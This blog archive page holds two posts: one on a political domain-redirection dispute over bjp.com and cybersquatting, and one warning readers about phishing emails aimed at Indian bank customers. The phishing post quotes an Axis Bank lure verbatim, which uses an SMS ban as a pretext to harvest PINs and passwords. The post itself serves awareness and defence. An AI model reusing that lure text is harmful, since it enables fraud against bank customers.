Category Archives: Security

BJP vs Congress Domain War

Internet, Security, , , , , , , ,

Indian politicians now take their war to the cyberspace. The ruling Indian National Congress party and the main opposition party Bharatiya Janata Party (BJP) are embroiled in a bitter war over domain redirection of BJP.COM

BJP

Congress Vs BJP on BJP.COM

It all started on October 3rd a http request to http://bjp.com would redirect to Congress party’s website. It appears like some smart bloke (read Cyber Savy) at Congress or a prankster setup this redirection.

However, Congress now appears to have taken a step back with the request to http://bjp.com now landing on a parked page with ads. A Whois search for http://bjp.com owners is protected meaning the contacts have decided not disclose their details in public.  The Whois records reveals that the page was further updated on October 4th (stopping the redirection to INC website) and this could be owing to the legal notice or pressure from BJP accusing congress of Cyber Theft /Cyber Fraud.

But what was Bharatiya Janata Party – BJP doing all this time? A lookup* at the history of this site reveals that it has changed ownership and content being online since 1998 for the first time. The last time this page was updated was in 2008. Since February 1998 to 2008 it was used by Brighton Journal of Philosophy (BJP) for their online journal on philosophy. So Bharatiya Janata Party did not bother to claim ownership of this domain if they considered http://BJP.COM to be their Intellectual Property, till Congress capitalized on this.

Bharatiya Janata Party might still need to watch out and take action quickly as other combinations of BJP are parked and might be available for sale. Its a hassle as even a simple typo might lead to different website and with Blackhat SEO techniques these days, it might even surpass the legitimate domain, if some one were to search for the domain.

This might serve as a reminder to many that unless you act fast and claim the ownership of your related assets online (domain names, twitter handles and other Social Networking site presence), people are just waiting to hijack them.

Cybersquatting is a common term given to such practices where a third-party buys and claims ownership of domain addresses, which would ideally belong to respective businesses, people etc and these Cybersquatters charge a fortune to give up their squatting rights if a legal course is not favorable to those who legitimately own them.

Sometime back the single bench Cyber Tribunal appellate in India asked the owners of a travel portal http://oktatabyebye.com owned by MakeMyTrip to give up their ownership of the domain and relinquish it to TATA sons because it contained the word Tata. Looks like this case may not be over as OkTataByeBye.com folks have put up their request for ‘support and help’ to retain this domain. You can read the request page HERE

* Source: Internet Archive

Phishing attack leveraging SMS ban

Mobile, Security, , , , , , , , , , , ,

 

Today morning was just about going as usual till I noticed an email. It seemed to originate from AXIS bank and it had an HTML attachment and it was an important announcement.

The contents of the email looked valid considering Government of India had placed a ban on sending of bulk SMS till 29th. Now I am not sure if such ban holds good for financial institutions. But some smart bloke seems to have capitalized on this ban. The email stated that:

“In view of the Govt. of India directive to mobile operators, all the corporate sms messaging services have been blocked for the next 72 hours. This period may increase. In view of this exigency, Axis Bank Net Secure Code and transaction alerts delivery has been effected. Therefore, till the Govt. of India permits restoration of the system. 

Axis Bank customers may not be able to conduct Internet Banking transactions that use SMS for delivering the NetSecure code. This is a regulation by Govt. of India and beyond Axis Bank’s control.

We have attached a form to this email. Please DOWNLOAD the form attached to this email so that you can fill and submit it Online to us , so that we can verify your account , After the Govt. of India permits restoration of the system. .
NOTE: The form needs to be opened in a modern browser which has javascript enabled ( Internet Explorer 7, Firefox 3, Safari 3, Opera 9)”

Now unlike the other phishing emails that I have encountered this one seemed different and the content (read grammar) also looks more in line from a professional agency and in tandem with the events that are happening in India.

This is the snapshot of the email:

 

Phishing Email targetting Axisbank

 

I opened the HTML attachment, after a customary scan from AV. Now although this looks authentic, but is a bit suspicious because it is asking for too many private details that should evoke second thoughts from anybody. Generally any phishing attack would ask for username, password, cvv details at the max. But this one is prompting for ATM PIN,Transaction password, Secure Code/Verified by Visa, Email details. And unlike others where you enter the details on a site, it is sending an attachment to be filled and submitted. Modus Operandi is slightly different.

I bet someone who is familiar with Axis bank’s online transaction mechanism has set this up because Axis bank requires transaction password in addition to the details mentioned above for a online transaction. Now, the form is a html attachment and when you open everything looks authentic just take a look below.

 

 

 

Phishing HTML attachment targetting Axis bank

This is it, but once you look at the page source carefully you will realize the bait. Using the POST method, all details would go to the URL specified instead of Axis bank:

 

Phishing URL targetting Axis bank

 

A Whois lookup for the domain above lists that is based out of Poland. All I can do is just notify Axis bank of this. It would have been better if the Government of India or the financial institutions have had made it clear if their services would continue to operate or be impeded due to this SMS ban.

Take care and please spread a word to ensure people do not fall for this

UPDATE:

I would have thought that the content in their email was written by a smart bloke, but it’s actually flicked from Axis Bank’s login page!

11 October

Received another Phishing email with the similar modus operandi , this time targeting ICICI Bank and hosted at:

 

Phishing email targeting ICICI customers


17th October

Another day, another Phishing email. The phishers are just not leaving any stone unturned as they target every bank with an online presence, this time targeting customers of HDFC Bank and hosted at:

 

 

Phishing email targeting HDFC Bank customers

Here is the Phished URL:

 

 

Phishing email targeting HDFC Bank customers

Oh Wait..I think I just saw a similar email targeting Punjab National Banks’s customers land in my inbox!….